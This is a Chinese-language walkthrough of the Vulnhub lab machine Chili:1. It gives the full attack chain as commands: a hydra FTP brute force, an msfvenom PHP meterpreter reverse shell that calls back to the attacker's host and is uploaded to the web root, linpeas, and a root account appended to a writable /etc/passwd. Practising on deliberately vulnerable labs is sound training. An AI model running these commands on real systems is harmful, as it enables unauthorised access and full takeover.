Vulnhub靶場練習:Chili:1


一、環境搭建

1、官網下載連接:https://www.vulnhub.com/entry/chili-1,558/

2、使用VMware Workstation Pro將下載的環境文件導入到虛擬機軟件

3、為了方便練習,將網卡模式修改為橋接模式,啟動即可

 

 二、靶場攻略

1、使用命令:netdiscover -i eth0 -r 10.10.114.0/16,發現靶場的ip

 2、收集靶場的端口信息,尋找突破點,使用命令:nmap -sV -A -p- 10.10.114.5

發現開啟的端口有,21、端口

 3、訪問http的端口尋找漏洞,首頁只有一個圖片,無其他線索

 查看首頁的源碼,發現一部分多余單詞,像是一些名稱

4、使用命令:cewl http://10.10.114.5/ > user.txt,爬取網頁並生成字典,爬取的字符只有首字母大寫的用戶名,自行向里面添加全小寫的字符

 

5、使用命令:hydra -L user.txt -P /usr/share/wordlists/rockyou.txt -f -V 10.10.114.5 ftp,成功爆破處ftp賬戶密碼

 6、使用爆破出的賬號,密碼成功登錄ftp

 7、切換到網站目錄,/var/www/html,發現可讀可寫可執行的.nano目錄

8、使用put命令,上傳shell.php文件

使用命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.114.170 LPORT=2345 R > shell.php,生成php反彈shell腳本

使用put命令,在ftp服務器中,將shell.php上傳到.nano目錄中

使用命令:chmod 777 shell.php,將shell.php賦予執行權限

 9、啟動msf,使用payload為之前生成后門所用的payload,之后訪問http://10.10.114.5/.nano/shell.php,順利拿到shell

 10、下載輔助提權腳本,腳本下載連接:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

下載之后,將linux下用來搜索掃描輔助提權的腳本,在ftp中,使用put命令上傳到.nano目錄,並賦予執行權限

 

 11、執行linpeas.sh腳本,發現了利用的文件為passwd文件,可寫入

 12、passwd 文件有寫入權限,我們可以自己寫一個root權限的空密碼賬號進去,再用passwd寫入密碼來進行提權

使用命令:/usr/bin/perl -le 'print crypt("test","test")',這個命令為使用perl腳本語言,執行crypt模塊,將test加密字符串輸出

 使用命令:echo "test:teH0wLIpW0gyQ:0:0:ROOT:/root:/bin/bash" >> /etc/passwd,在passwd文件中,寫入test賬戶信息

 使用命令:su test,輸入密碼test,切換賬戶,成功提權為root

 完


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM